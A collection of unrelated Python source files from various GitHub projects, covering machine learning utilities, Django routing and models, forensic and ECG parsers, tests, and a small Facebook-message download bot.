for i in range(df_o.shape[0]):
odict['mutation'].append(str(df_o[1][i])+str(df_o[2][i])+str(df_o[3][i]))
odict['position'].append(str(df_o[2][i]))
odict['energy'].append(df_o['total energy'][i])
odict['SD'].append(df_o['SD'][i])
CompleteList_df = pd.DataFrame(odict)
CompleteList_SortedByEnergy_df = CompleteList_df.sort_values('energy').reset_index(drop=True)
def BetsPerPosition(df):
position_list = []
length = df.shape[0]
for i in range(length):
if df['position'][i] in position_list:
df = df.drop(index=i)
else:
position_list.append(df['position'][i])
return df.reset_index(drop=True)
def BelowCutOff(df,cutoff):
#position_list = []
length = df.shape[0]
for i in range(length):
if float(df['energy'][i]) > float(cutoff):
df = df.drop(index=i)
else:
continue
return df.reset_index(drop=True)
BestPerPosition_SortedByEnergy_df = BetsPerPosition(CompleteList_SortedByEnergy_df)
BestPerPosition_df = BetsPerPosition(CompleteList_SortedByEnergy_df)
BelowCutOff_df = BelowCutOff(CompleteList_df,-1)
BelowCutOff_SortedByEnergy_df = BelowCutOff(CompleteList_SortedByEnergy_df,-1)
BestPerPositionBelowCutOff_SortedByEnergy_df = BelowCutOff(BestPerPosition_SortedByEnergy_df,-1)
BestPerPositionBelowCutOff_df = BelowCutOff(BestPerPosition_df,-1)
def variablename(var):
import itertools
return [tpl[0] for tpl in filter(lambda x: var is x[1], globals().items())]
def out_tab_file(df):
df_name = variablename(df)[0]
filename = "MutationsEnergies_"+df_name[:-3]+".tab"
with open(filename,"w+") as of:
of.write(BestPerPositionBelowCutOff_df.to_csv(columns=['mutation', 'energy', 'SD'], sep='\t', index=False))
of.close()
out_tab_file(CompleteList_df)
out_tab_file(CompleteList_SortedByEnergy_df)
out_tab_file(BestPerPosition_SortedByEnergy_df)
out_tab_file(BestPerPosition_df)
out_tab_file(BelowCutOff_df)
out_tab_file(BelowCutOff_SortedByEnergy_df)
out_tab_file(BestPerPositionBelowCutOff_SortedByEnergy_df)
out_tab_file(BestPerPositionBelowCutOff_df)
| 3,403 |
utils/fasttext_utils.py
|
samujjwaal/multilingual-chatbot
| 0 |
2169248
|
# import libraries
import wget
import os
import fasttext
fasttext.FastText.eprint = lambda x: None
url = [
# 917kB, compressed version of the model
"https://dl.fbaipublicfiles.com/fasttext/supervised-models/lid.176.ftz",
# 126MB, faster and slightly more accurate
"https://dl.fbaipublicfiles.com/fasttext/supervised-models/lid.176.bin",
]
model_names = list(map(lambda u: u.split("/")[-1], url))
# check whether a model is downloaded locally
def check_model_exist(option, path="models"):
os.makedirs(path, exist_ok=True)
if model_names[option] not in os.listdir("models"):
return False
else:
return True
# to download fasttext model locally
def download_model(option=0, path="models"):
if not check_model_exist(option):
wget.download(url[option], out=path)
# to load fasttext model from directory
def load_pretrained_model(option=0, path="models"):
download_model(option)
PRETRAINED_MODEL_PATH = f"{path}/{model_names[option]}"
lang_model = fasttext.load_model(PRETRAINED_MODEL_PATH)
return lang_model
# predict language of input text using fasttext
def predict_lang(prompt, option=0):
model = load_pretrained_model(option)
lang = model.predict(prompt)[0][0].split("__")[2]
return lang
| 1,328 |
equipmentdb/urls.py
|
Jongmassey/ubuc-dev
| 0 |
2170696
|
from django.urls import path
from django.views.generic import TemplateView
import inspect
from equipmentdb.model_base import classToURL
from equipmentdb.views import (
UbucBaseListView,
UbucBaseCreateView,
UbucBaseUpdateView,
index,
)
from . import views
def generatePath(view_class):
model_url = classToURL(view_class.model.__name__)
if UbucBaseListView in view_class.__bases__:
return path(model_url, view_class.as_view(), name=f"{model_url}-list")
if UbucBaseCreateView in view_class.__bases__:
return path(
f"{model_url}/add", view_class.as_view(), name=f"{model_url}-add"
)
if UbucBaseUpdateView in view_class.__bases__:
return path(
f"{model_url}/<int:pk>",
view_class.as_view(),
name=f"{model_url}-update",
)
if UbucBaseUpdateView in view_class.__bases__:
return path(
f"{model_url}/<int:pk>/delete",
view_class.as_view(),
name=f"{model_url}-delete",
)
urlpatterns = [
path("", index, name="index"),
path("about/", TemplateView.as_view(template_name="about.html")),
]
urlpatterns += [
generatePath(view_class)
for n, view_class in inspect.getmembers(views, inspect.isclass)
if "model" in view_class.__dict__
and view_class.__bases__[0]
in [
UbucBaseListView,
UbucBaseCreateView,
UbucBaseUpdateView,
UbucBaseUpdateView,
]
]
| 1,476 |
Scripts/dataset.py
|
tasnim7ahmed/Multi-Class-Multi-Label-Text-Classification-Using-BERT
| 0 |
2169650
|
import torch
import pandas as pd
from transformers import BertTokenizer
import numpy as np
from common import get_parser
parser = get_parser()
args = parser.parse_args()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
def format_label(label):
label = (str(label))
label = label[1:len(label)-2]
for char in label:
label = label.replace(".","")
return list(map(int, label.split(" ")))
class Dataset:
def __init__(self, text, target):
self.text = text
self.tokenizer = BertTokenizer.from_pretrained(args.pretrained_tokenizer_name)
self.max_length = args.max_length
self.target = target
def __len__(self):
return len(self.text)
def __getitem__(self, item):
text = str(self.text[item])
text = "".join(text.split())
inputs = self.tokenizer.encode_plus(
text = text,
padding = "max_length",
truncation = True,
max_length = self.max_length
)
input_ids = inputs["input_ids"]
token_type_ids = inputs["token_type_ids"]
attention_mask = inputs["attention_mask"]
return{
"input_ids":torch.tensor(input_ids,dtype = torch.long),
"attention_mask":torch.tensor(attention_mask, dtype = torch.long),
"token_type_ids":torch.tensor(token_type_ids, dtype = torch.long),
"target":torch.tensor(format_label(self.target[item]), dtype = torch.long)
}
def generate_dsfile(path):
df = pd.read_csv(path).dropna()
Label_Columns = df.columns.tolist()[3::2]
print(len(Label_Columns))
print(df[Label_Columns].sum().sort_values())
categorized_comment = df[df[Label_Columns].sum(axis=1) > 0]
uncategorized_comment = df[df[Label_Columns].sum(axis=1) == 0]
print(f'Categorized - {len(categorized_comment)}, Uncategorized - {len(uncategorized_comment)}')
comments = []
labels = []
for i in range(0,len(df.comment.values)):
current_comment = df.comment.values[i]
current_label = df[Label_Columns].values[i]
comments.append(current_comment)
labels.append(current_label)
sample_count = [0,0,0,0,0,0,0,0]
for label in labels:
for i in range(0,len(label)):
if(label[i]==1):
sample_count[i]+=1
print(sample_count)
ds_data = pd.DataFrame()
ds_data["comment"] = comments
ds_data["label"] = labels
ds_data.to_csv("../Dataset/mod.csv")
del ds_data
if __name__=="__main__":
#generate_dsfile("../Dataset/train.csv")
if(args.augmentation=="True"):
data_dir = args.aug_train_file
else:
data_dir = args.train_file
df = pd.read_csv(data_dir).dropna()
print(df.head())
dataset = Dataset(text=df.comment.values, target=df.label.values)
print(dataset[0])
| 2,902 |
lib/python/flame/optimizer/fedopt.py
|
GaoxiangLuo/flame
| 6 |
2168968
|
# Copyright 2022 Cisco Systems, Inc. and its affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
"""FedOPT optimizer"""
"""https://arxiv.org/abs/2003.00295"""
from abc import abstractmethod
import logging
from diskcache import Cache
from .fedavg import FedAvg
from ..common.util import (MLFramework, get_ml_framework_in_use,
valid_frameworks)
from collections import OrderedDict
logger = logging.getLogger(__name__)
class FedOPT(FedAvg):
"""FedOPT class."""
def __init__(self, beta_1, beta_2, eta, tau):
"""Initialize FedOPT instance."""
super().__init__()
self.current_weights = None
self.d_t = None
self.m_t = None
self.v_t = None
self.beta_1 = beta_1
self.beta_2 = beta_2
self.eta = eta
self.tau = tau
ml_framework_in_use = get_ml_framework_in_use()
if ml_framework_in_use == MLFramework.PYTORCH:
self.adapt_fn = self._adapt_pytorch
elif ml_framework_in_use == MLFramework.TENSORFLOW:
self.adapt_fn = self._adapt_tesnorflow
else:
raise NotImplementedError(
"supported ml framework not found; "
f"supported frameworks are: {valid_frameworks}")
def do(self, cache: Cache, total: int):
"""Do aggregates models of trainers.
Return: aggregated model
"""
logger.debug("calling fedopt")
self.agg_weights = super().do(cache, total)
if self.agg_weights is None:
return self.current_weights
if self.current_weights is None:
self.current_weights = self.agg_weights
else:
self.adapt_fn(self.agg_weights, self.current_weights)
return self.current_weights
@abstractmethod
def _delta_v_pytorch(self):
return
@abstractmethod
def _delta_v_tensorflow(self):
return
def _adapt_pytorch(self, average, current):
import torch
logger.debug("calling _adapt_pytorch")
self.d_t = {k: average[k] - current[k] for k in average.keys()}
if self.m_t is None:
self.m_t = {k: torch.zeros_like(self.d_t[k]) for k in self.d_t.keys()}
self.m_t = {k: self.beta_1 * self.m_t[k] + (1 - self.beta_1) * self.d_t[k] for k in self.m_t.keys()}
if self.v_t is None:
self.v_t = {k: torch.zeros_like(self.d_t[k]) for k in self.d_t.keys()}
self._delta_v_pytorch()
self.current_weights = OrderedDict({k: self.current_weights[k] + self.eta * self.m_t[k] / (torch.sqrt(self.v_t[k]) + self.tau) for k in self.current_weights.keys()})
def _adapt_tesnorflow(self, average, current):
logger.debug("calling _adapt_tensorflow")
# TODO: Implement Tensorflow Version
raise NotImplementedError("Tensorflow implementation not yet implemented")
| 3,432 |
src/server/app/main/models/SignUpContestModel.py
|
vetrivelcsamy/execode
| 0 |
2169257
|
from .. import db
import datetime
class SignUpContestModel(db.Model):
__tablename__ = 'signup_contest'
id = db.Column(db.Integer, primary_key=True)
created_at = db.Column(db.DateTime(timezone=True),
nullable=False, default=datetime.datetime.now())
contest_id = db.Column(db.Integer, db.ForeignKey(
'contests.id'), nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey(
'users.id'), nullable=False)
| 471 |
tests/test_cli/test_cli_exceptions.py
|
charles-l/pyinfra
| 1,532 |
2170819
|
from unittest import TestCase
from click.testing import CliRunner
from pyinfra_cli.exceptions import CliError
from pyinfra_cli.main import cli
class TestCliExceptions(TestCase):
@classmethod
def setUpClass(cls):
cls.test_cli = CliRunner()
cls.old_cli_show = CliError.show
@classmethod
def tearDownClass(cls):
CliError.show = cls.old_cli_show
def setUp(self):
self.exception = None
CliError.show = lambda e: self.capture_cli_error(e)
def capture_cli_error(self, e):
self.exception = e
self.old_cli_show()
def assert_cli_exception(self, args, message):
self.test_cli.invoke(cli, args)
self.assertIsInstance(self.exception, CliError)
assert self.exception.message == message
def test_bad_deploy_file(self):
self.assert_cli_exception(
['my-server.net', 'nop.py'],
'No deploy file: nop.py',
)
def test_bad_fact(self):
self.assert_cli_exception(
['my-server.net', 'fact', 'thing'],
'No fact: thing',
)
| 1,103 |
backend/ml/detector.py
|
ucinlp/covid19-backend
| 6 |
2168840
|
"""
Abstract base class for misconception detectors
"""
from typing import Any, Dict, List, Union
import numpy as np
from backend.ml.misconception import MisconceptionDataset
# TODO: @rloganiv - The detector/misconception interaction would be better handled by using the
# observer design pattern to update the misconception encodings whenever the misconception dataset
# issues a notification that it has been updated. The issue with the current approach is that it
# may cache redundant data.
class Detector:
"""
Abstract base class for a misconception detector.
"""
def __init__(self):
self._cache: Dict[str, Any] = {}
def _encode(self, sentences: List[str]):
raise NotImplementedError
def _predict(self, scores: np.ndarray) -> List[List[int]]:
raise NotImplementedError
def predict(self,
sentence: str,
misconceptions: MisconceptionDataset) -> Dict[str, Any]:
"""
Predicts whether a given piece of text corresponds to a misconception.
# Parameters
sentences : str or List[str]
The text to score. Can either be a string or a list of strings.
misconceptions : MisconceptionDataset
The misconceptions to score against.
# Returns
output : Dict[str, Any]
A dictionary of the prediction results. Will be serialized to JSON.
"""
# TODO: @rloganiv - Current implementation works on a single sentence since that is the
# expected input from the frontend. For evaluation purposes it probably makes sense to
# allow predictions on batches on instances as well...maybe as a seperate method so output
# type is consistent.
scores = self.score(sentence, misconceptions)
predictions = self._predict(scores)[0]
# TODO: Relevance prediction
readable_predictions = []
for idx in predictions:
score = scores[0, idx]
misconception = misconceptions[idx]
readable_predictions.append({
'misinformation_score': float(score),
'misinformation': misconception,
})
output_dict = {
'input': sentence,
'relevant': True,
'predictions': readable_predictions,
}
return output_dict
def _score(self, sentences, misconceptions) -> np.ndarray:
raise NotImplementedError
def score(self,
sentences: Union[str, List[str]],
misconceptions: MisconceptionDataset) -> np.ndarray:
"""
Scores whether or not a given piece of text corresponds to a misconception.
# Parameters
sentences : str or List[str]
The text to score. Can either be a string or a list of strings.
misconceptions : MisconceptionDataset
The misconceptions to score against.
# Returns
scores : np.ndarray
An array with shape (num_sentences, num_misconceptions) containing the scores.
"""
# encode misconceptions and cache to avoid needless recomputation.
if misconceptions not in self._cache:
self._cache[misconceptions] = self._encode(misconceptions.sentences)
encoded_misconceptions = self._cache[misconceptions]
if isinstance(sentences, str):
sentences = [sentences]
encoded_sentences = self._encode(sentences)
scores = self._score(encoded_sentences, encoded_misconceptions)
return scores
def refresh_cache(self) -> None:
"""
Refresh (clear) the misconception cache.
"""
self._cache = {}
| 3,691 |
codes/run_yelp.py
|
BGT-M/AugSplicing
| 1 |
2170342
|
from codes.invoke import optimiAlgo
if __name__ == '__main__':
'yelp data'
inputfile = '../data/yelp/input.tensor'
outpath = '../output/yelp/AugSplicing'
s = 30 # time stride(day)
maxSp = 30 # the maximum splicing number at each epoch
delimeter, N = ',', 3 # the delimeter/dimension of input data
steps = 30 # the number of time steps
k, l = 10, 5 # the number of top blocks we find/ slack constant
optimiAlgo(inputfile, outpath, s, k, l, maxSp, N, delimeter, steps=30)
| 513 |
logic/src/libs/multiple_async_requests.py
|
alexgreendev/UserDataBase
| 0 |
2166734
|
import asyncio
# import json
# import time
from aiohttp import ClientSession, client_exceptions
from asyncio import Semaphore, ensure_future, gather, run
# from merge_lists import merge_lists
# noinspection PyUnresolvedReferences
class MultipleAsyncRequests:
def __new__(cls):
cls.urls = []
cls.semaphore = 10
cls.http_ok = []
return cls
@classmethod
def add_url(cls, url):
cls.urls.append(url)
return cls
@classmethod
def add_status_ok(cls, http_ok):
cls.http_ok.append(http_ok)
return cls
@classmethod
def set_connection_limit(cls, limit):
asyncio.set_event_loop(asyncio.new_event_loop())
cls.semaphore = Semaphore(limit)
return cls
@classmethod
def request(cls) -> list:
return run(cls.__scrape())
@classmethod
async def __scrape(cls):
tasks = list()
async with ClientSession() as session:
for url in cls.urls:
task = ensure_future(cls.__scrape_bounded(url, cls.semaphore, session))
tasks.append(task)
result = await gather(*tasks)
return result
@classmethod
async def __scrape_bounded(cls, url, sem, session):
async with sem:
return await cls.__scrape_one(url, session)
@classmethod
async def __scrape_one(cls, url, session):
try:
async with session.get(url) as response:
content = await response.read()
except client_exceptions.ClientConnectorError:
return None
if response.status not in cls.http_ok:
return None
return content
# if __name__ == '__main__':
# iter = 1000
# while iter:
# res = MultipleAsyncRequests(). \
# add_url('http://localhost:7000/remote-servers/one.json'). \
# add_url('http://localhost:7000/remote-servers/two.json'). \
# add_url('http://localhost:7000/remote-servers/three.json'). \
# add_status_ok(200). \
# set_connection_limit(1000). \
# request()
# users_arrs = [json.loads(arr.decode()) for arr in res]
# users = merge_lists(users_arrs)
# print(sorted(users, key=lambda i: i['id']))
# print(len(users))
# iter -= 1
| 2,333 |
scripts/artifacts/snapchatMemimg.py
|
f0r3ns1cat0r/RLEAPP
| 0 |
2169669
|
import os
import datetime
import csv
import calendar
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows, media_to_html, kmlgen
def monthletter(month):
monthdict = {'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06', 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12'}
return monthdict[month]
def get_snapchatMemimg(files_found, report_folder, seeker, wrap_text):
userlist = []
start_terms = ('memories','custom_sticker')
for file_found in files_found:
file_found = str(file_found)
filename = os.path.basename(file_found)
one = (os.path.split(file_found))
username = (os.path.basename(one[0]).split('-')[0])
if username not in userlist:
userlist.append(username)
#print(userlist)
for name in userlist:
data_list_media = []
for file_found in files_found:
file_found = str(file_found)
filename = os.path.basename(file_found)
if filename.startswith(start_terms):
metadata = filename.split('~')
if name == metadata[3]:
typeoffile = metadata[0]
timestamp = metadata[2]
timestamp = timestamp.split('-')
org_string = timestamp[5]
mod_string = org_string[:-3]
timestamp = f'{timestamp[0]}-{timestamp[1]}-{timestamp[2]} {timestamp[3]}:{timestamp[4]}:{mod_string}'
usernamefile = metadata[3]
media = media_to_html(file_found, files_found, report_folder)
file_found_dir = os.path.dirname(file_found)
data_list_media.append((timestamp,media,filename,usernamefile,typeoffile,))
if data_list_media:
report = ArtifactHtmlReport(f'Snapchat - Memories')
report.start_artifact_report(report_folder, f'Snapchat - Memories - {name}')
report.add_script()
data_headers = ('Timestamp','Media','Filename','User','File Type')
report.write_artifact_data_table(data_headers, data_list_media, file_found_dir, html_no_escape=['Media'])
report.end_artifact_report()
tsvname = f'Snapchat - Memories - {name}'
tsv(report_folder, data_headers, data_list_media, tsvname)
tlactivity = f'Snapchat - Memories- {name}'
timeline(report_folder, tlactivity, data_list_media, data_headers)
else:
logfunc(f'No Snapchat - Memories - {name}')
| 2,732 |
user.py
|
Chris-karanja/Password-Locker
| 0 |
2169959
|
from credentials import Credentials
class User:
"""Class Generates new instances of Users"""
Users = [] #list of users
username = ''
email = ''
password = ''
def __init__(self, username, email, password):
self.username = username
self.email = email
self.password = password
def add_user(self):
"""save_contact method saves contact objects into contact_list"""
User.Users.append(self)
@classmethod
def find_user(cls,persona,secret):
'''
Method that takes in a persona and returns a user that matches that persona.
Args:
persona: Person to search for
Returns :
details of person that matches the persona.
'''
for saved_user in cls.Users:
if saved_user.username == persona and saved_user.password == secret:
return saved_user
@classmethod
def user_exist(cls,persona):
'''
Method that checks if a user exists from the user list.
Args:
persona: username to search if it exists
Returns :
Boolean: True or false depending if the user exists
'''
for person in cls.Users:
if person.username == persona:
return True
return False
@classmethod
def display_users(cls):
'''
method that returns the user list
'''
return cls.Users
@classmethod
def user_exist(cls, persona):
'''
Method that checks if a user exists from the user list.
Args:
persona: username to search if it exists
Returns :
Boolean: True or false depending if the user exists
'''
for person in cls.Users:
if person.username == persona:
return True
return False
@classmethod
def display_users(cls):
'''
method that returns the user list
'''
return cls.Users
| 1,972 |
bin/pannzer/operators/naive.py
|
nestorzaburannyi/annotate
| 1 |
2170621
|
import sys
from myoperator import BlockOperator
# Clone a rowwise operator. Class name and file name (operators/classname.py) must be identical.
class naive(BlockOperator) :
"""Naive predictor as in CAFA: p(goid) is its base frequency in GOA. Input: qpid list"""
def __init__(self,glob):
self.glob=glob
# define nicknames for column indices
[self.data,self.prediction_data]=self.glob.use_sheets(["data","prediction"])
[self.qpid_col]=self.data.use_columns(["qpid"])
self.prediction_data.use_columns(["qpid","goid","frequency","ontology","description"])
# use online dictionary. Object handles in glob are hardcoded
self.glob.use_online_dictionaries(['GOIDELIC']) # downloads copy in Runner
self.pred=None
def process(self,block):
try:
row=block[0]
except:
return # empty block
if not self.pred: self.pred=self.naive() # load base frequencies
qpid=row[self.qpid_col] # input protein identifier
# multiply predictions for each qpid
for x in self.pred:
datarow=[qpid] + x
self.prediction_data.append_row(datarow)
def naive(self):
"base frequencies of GO terms, truncated to 2 decimals"
pred=[] # tuples (goid,freq)
for goid in self.glob.GOcounts.keys():
ontology=self.glob.ontology[goid]
rootcount=self.glob.rootcount[ontology]
if rootcount<1: continue
count=self.glob.GOcounts[goid]
freq=float(count)/rootcount
if freq >= 0.01: pred.append( [goid, "%.2f" %freq, ontology, self.glob.godesc[goid] ] )
return(pred)
| 1,733 |
shelter/migrations/0004_auto_20200718_1403.py
|
kermox/schronisko-krakow
| 1 |
2170433
|
# Generated by Django 3.0.5 on 2020-07-18 14:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shelter', '0003_auto_20200717_1605'),
]
operations = [
migrations.AlterField(
model_name='animal',
name='additional_information',
field=models.TextField(blank=True, default='', verbose_name='dodatkowe informacje'),
),
]
| 448 |
msg.py
|
AshrafAkon/download_link_from_facebook_message
| 0 |
2170808
|
from fbchat import Client
from fbchat.models import *
import xmlrpc.client as rpc
import requests
import time
import urllib.parse
import random
from settigs import group_id, email_id, id_password, file_path, log_file, rpc_url, key
from settings import who_sent
#################
#global_variables
new_msg = []
old_msg = []
unique_req = []
allowed_arg = ['link', 'torrent', 'meta']
grp_chat_id = group_id
i = 1
####end
with open(file_path, "w") as f:
file.read()
with open(log_file, "w") as f:
file.read()
def start_down(file_type, data, author):
if file_type == 'link' or file_type == 'meta':
gid = server.aria2.addUri(key,[data])
name = server.aria2.tellStatus(key, gid)['files'][0]['path'].split("/")[-1]
confirmed_text = f"Your download has started with the file name {name}"
client.send(Message(text=confirmed_text), thread_id=author, thread_type=ThreadType.USER)
down_started = f"download started from {who_sent(author)} with the file name {name}"
with open(log_file, 'a') as log:
log.write(down_started)
print(down_started)
elif file_type == 'torrent':
url = urllib.parse.unquote(data).split("php?u=")[1]
fil = requests.get(url).content
#print(fil)
gid = server.aria2.addTorrent(key, rpc.Binary(fil))
name = server.aria2.tellStatus(key, gid)['files'][0]['path'].split("/")[-1]
confirmed_text = f"You download has started with the file name {name}"
client.send(Message(text=confirmed_text), thread_id=author, thread_type=ThreadType.USER)
down_started = f"download started from {who_sent(author)} with the file name {name}"
with open(log_file, 'a') as log:
log.write(down_started)
print(down_started)
else:
print("not a valid data type")
def torrent_file(message): #a message object will be supplied and it will return the url of the file
attachment = message.attachments[0]
if isinstance(attachment, FileAttachment): #check if its file
url = attachment.url #fetching the url
file_name = attachment.name
return url, file_name
"""this function bellow(split_uid_msg) receives a message object and then return a list in this format [uid, [file_type, link or torrent_file_url]] """
def split_uid_msg(message):
uid = message.uid
text_msg = message.text.split(' ')
#file_type, text_msg = message.text.split(' ')
if len(text_msg) == 2 or message.attachments:
if len(text_msg) == 1 and len(message.attachments) == 1:
link, name = torrent_file(message)
print(name)
return [uid, 'torrent' , link, message.author]
else:
#file_type, text_msg = message.text.split(' ')
print(text_msg[0])
return [uid, text_msg[0], text_msg[1], message.author]
else:
pass
def unique_requests(list1):
#list1 = new list of data fetched from messages, list2 = old data
simple_list = []
final_list = []
list2 = []
with open(file_path, 'r') as f:
x = f.read()
y = x.split('&&&7_7&&&')
y.pop()
for z in y:
list2.append(z.split('%%%5_5%%%'))
if len(list2) > 0:
for curr in list2:
simple_list.append(curr[0])
for i in list1:
if i[0] in simple_list:
pass
else:
final_list.append(i)
if len(final_list) > 0:
with open(file_path, 'a') as f:
for i in final_list:
for n in i:
f.write(n)
f.write('%%%5_5%%%')
f.write('&&&7_7&&&')
return final_list
#logging to user
client = Client(email_id, id_password)
while True:
print(f"\n\n\n\n\n\n\nnew session. session number {i}")
last_ten_msg = client.fetchThreadMessages(thread_id=grp_chat_id, limit=10)
if len(last_ten_msg) > 0:
print("new req")
for current_msg in last_ten_msg: #storing the messages in a organized way
if current_msg.text == None:
pass
elif current_msg.attachments:
new_msg.append(split_uid_msg(current_msg))
elif split_uid_msg(current_msg) == None:
pass
else:
new_msg.append(split_uid_msg(current_msg))
print("\n\n\n")
print(f"new msg = {new_msg}")
unique_req = unique_requests(new_msg)
print(f"unique req = {unique_req}")
if len(unique_req) > 0:
for download in unique_req:
print(download[1], download[2], download[3])
start_down(download[1], download[2], download[3])
#old_msg = []
#old_msg = unique_req
else:
print(f"nothing to download on session {i}")
#if len(unique_re
#old_msg = []
#old_msg = unique_req
last_ten_msg = []
new_msg = []
unique_req = []
print(f"{i} session finished")
time.sleep(90)
else:
time.sleep(60)
i += 1
| 5,387 |
test_output.py
|
varshashivhare/Mastering-Python
| 30 |
2169925
|
import os
import time
import glob
import pytest
@pytest.mark.parametrize('output_filename', glob.iglob('*/*.out'))
def test_output(xprocess, output_filename):
output_filename = os.path.abspath(output_filename)
def prepare(cwd):
return '', ['python3', name + '.py']
name, ext = os.path.splitext(output_filename)
pid, log_file = xprocess.ensure(output_filename, prepare)
while xprocess.getinfo(output_filename).isrunning():
time.sleep(0.01)
with open(output_filename) as output_file:
assert output_file.read() == log_file.read()
| 582 |
etl/parsers/etw/Microsoft_Windows_CertificateServicesClient_CredentialRoaming.py
|
IMULMUL/etl-parser
| 104 |
2170918
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-CertificateServicesClient-CredentialRoaming
GUID : 89a2278b-c662-4aff-a06c-46ad3f220bca
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1001, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1001_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1002, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1002_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1003, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1003_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1004, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1004_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1005, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1005_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1006, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1006_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1007, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1007_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1010, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1010_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1012, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1012_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
| 2,680 |
graphility/database_gevent.py
|
Gromobrody/codernitydb3
| 1 |
2169915
|
from graphility.database_safe_shared import SafeDatabase
from graphility.env import cdb_environment
try:
from gevent.lock import RLock
except ImportError:
raise NotImplementedError
cdb_environment["mode"] = "gevent"
cdb_environment["rlock_obj"] = RLock
class GeventDatabase(SafeDatabase):
pass
| 310 |
parse_xml_folder.py
|
tbj128/philips-ecg-parser
| 1 |
2168779
|
"""
Parses the PhilipsECG format and writes out the data to a CSV file and saves the 12-lead ECG waveforms as a single large NumPy array
Usage: python parse_xml_folder.py -i <input ECG XML folder> -o <output CSV> -n <output 12-lead ECG waveforms> -m <output ECG image folder>
Example: python parse_xml_folder.py -i ecgs -o output.csv -n output.npy -m ecg-imgs
"""
import os
import csv
import numpy as np
from philips import parse
from concurrent import futures
from tqdm import tqdm
import argparse
from pathlib import Path
import ecg_plot
#
# Main Code
#
def call_parse(args):
filename, path, output_image_folder = args
output_rows, leads = parse(path)
if output_image_folder is not None:
ecg_plot.plot(np.array(leads), sample_rate=500, title='12-Lead ECG', columns=1)
ecg_plot.save_as_png(f"{output_image_folder}/{filename.replace('.xml', '')}")
return output_rows, leads, filename
def main(args):
input_folder = args.input_folder
output_file = args.output_file
output_numpy = args.output_numpy
output_image_folder = args.output_image_folder
if output_image_folder is not None:
Path(output_image_folder).mkdir(parents=True, exist_ok=True)
with open(output_file, 'w') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csvwriter.writerow(["input_file_name", "date", "time", "dateofbirth", "sex", "mrn", "csn", "meanqrsdur", "meanprint", "heartrate", "rrint", "pdur", "qonset", "tonset", "qtint", "qtcb", "qtcf", "QTcFM", "QTcH", "pfrontaxis", "i40frontaxis", "qrsfrontaxis", "stfrontaxis", "tfrontaxis", "phorizaxis", "i40horizaxis", "t40horizaxis", "qrshorizaxis", "sthorizaxis", "severity", "statements"])
fs = []
with futures.ProcessPoolExecutor(4) as executor:
for filename in os.listdir(input_folder):
if filename.endswith(".xml"):
future = executor.submit(call_parse, [filename, os.path.join(input_folder, filename), output_image_folder])
fs.append(future)
overall_processed_leads = []
for future in tqdm(futures.as_completed(fs), total=len(fs)):
output_rows, processed_leads, filename = future.result(timeout=60)
for output_row in output_rows:
csvwriter.writerow([filename] + output_row)
if output_numpy is not None:
overall_processed_leads.append(processed_leads)
if output_numpy is not None:
np.save(output_numpy, np.array(overall_processed_leads))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Parses the PhilipsECG format and writes out the data to a CSV file and saves the 12-lead ECG waveforms as a single large NumPy array')
parser.add_argument('-i', '--input-folder',
required=True,
help='ECG XML folder')
parser.add_argument('-o', '--output-file',
required=True,
